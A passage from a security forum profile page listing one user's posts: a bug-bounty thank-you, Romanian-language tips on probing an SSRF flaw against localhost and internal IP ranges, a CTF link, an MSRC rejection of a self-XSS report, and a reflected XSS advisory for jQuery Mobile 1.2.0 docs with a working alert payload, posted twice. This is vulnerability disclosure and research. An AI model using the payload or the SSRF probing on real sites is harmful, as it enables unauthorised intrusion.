Jump to content

dr.d3v1l

Active Members
  • Posts

    187
  • Joined

  • Last visited

  • Days Won

    2

Posts posted by dr.d3v1l

  1. 22539766_10210788123481518_9163860965501

    Dear Dr.d3v1l

     

    The vulnerabilities you reported has been fixed.

    As a token of our appreciation we would like to offer you a t-shirt. If you would like a t-shirt please provide us with your preferred t-shirt size (S/M/L/XL/XXL) and on what address you would like to receive the t-shirt.

    Thanks in advance for your reply and thanks again for your report.

     

    Sincerely,

     
    • Like 1
    • Upvote 6
  2. 9 hours ago, TheTime said:

    Cateva idei:

    1. Ai dezvaluit identitatea serverului vulnerabil, te las pe tine sa-ti dai seama cum si unde.

    2. Daca esti sigur ca aplicatia web ruleaza pe linux, incearca ssh:// sau ssh2:// wrappers. Poate foloseste vreo versiune de SSH client vulnerabila la RCE... cine stie.

    3. Eu nu cred ruleaza pe linux, ci pe windows. Are sens de ce nu poti citi /etc/passwd?

    4. Ai gasit o metoda de a exfiltra date? Cum iti dai seama daca poti citi sau nu un fisier de pe disc? SSRF-ul merge, ai incercat sa vezi ce aplicatii web sunt gazduit local / in reteaua interna? http://localhost / https://localhost / http:localhost:8080 / http(s)://10.1.1.1 (bruteforce pe ip-uri)

    5. Esti autorizat sa le testezi oamenilor infrastructura, sau...? :D

    5) da sunt autizat , doar ca au cerut ce pot exploita . De asta am pus ($$) , dar din cate am mai verificat ... nu merge 

     

  3. CTF DOWNLOAD ---> https://www.vulnhub.com/entry/sickos-11,132/

    "This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. This vm is very similar to labs I faced in OSCP. The objective being to compromise the network/machine and gain Administrative/root privileges on them."

    _____________________________________________________________________________________________________________________________________________________

    Există mai multe metode pentru ao rezolva : https://www.vulnhub.com/entry/sickos-11,132/#walkthrough

    _____________________________________________________________________________________________________________________________________________________

    • Upvote 3
  4. Hello,

    Thank you for reporting this issue to the Microsoft Security Response Center (MSRC). Self-XSS is not considered a security vulnerability as it requires social engineering.

    Please see the following for more information:

    "Definition of a Security Vulnerability"

    <https://msdn.microsoft.com/en-us/library/cc751383.aspx>

    "Online Services Bug Bounty Terms"

    <https://technet.microsoft.com/en-us/security/dn800983>

    Thanks, @n3curatu

  5. 1rfaeu.jpg

    # Exploit Title: jQuery Mobile Docs 1.2.0 final XSS Reflected

    # Software Link: jQuery Mobile: Demos and Documentation

    # Exploit Author: Dr.d3v1l

    # Tested On : Windows FireFox

    # CVE : N/A

    # Category: webapps

    # Date: 05/09/2015

    1. Description

    Reflective XSS on forms-sample-response.php?shipping=

    2. POC

    URL:

    404 Not Found

    e.g.

    code: "><img src="http://url.to.file.which/not.exist" onerror=alert(1);>

    URL+CODE= http://localhost/mobile_site/templates/docs/forms/forms-sample-response.php?shipping="><img src="http://url.to.file.which/not.exist" onerror=alert(1);>

    3. Solution:

    Update to version 1.3.1

    jQuery Mobile Demos

  6. # Exploit Title: jQuery Mobile Docs 1.2.0 final XSS Reflected

    # Software Link: jQuery Mobile: Demos and Documentation

    # Exploit Author: Dr.d3v1l

    # Tested On : Windows FireFox

    # CVE : N/A

    # Category: webapps

    # Date: 05/09/2015

    1. Description

    Reflective XSS on forms-sample-response.php?shipping=

    2. POC

    URL:

    404 Not Found

    e.g.

    code: "><img src="http://url.to.file.which/not.exist" onerror=alert(1);>

    URL+CODE= http://localhost/fileadmin/mobile_site/templates/docs/forms/forms-sample-response.php?shipping="><img src="http://url.to.file.which/not.exist" onerror=alert(1);>

    3. Solution:

    Update to version 1.3.1

    jQuery Mobile Demos

×
×
  • Create New...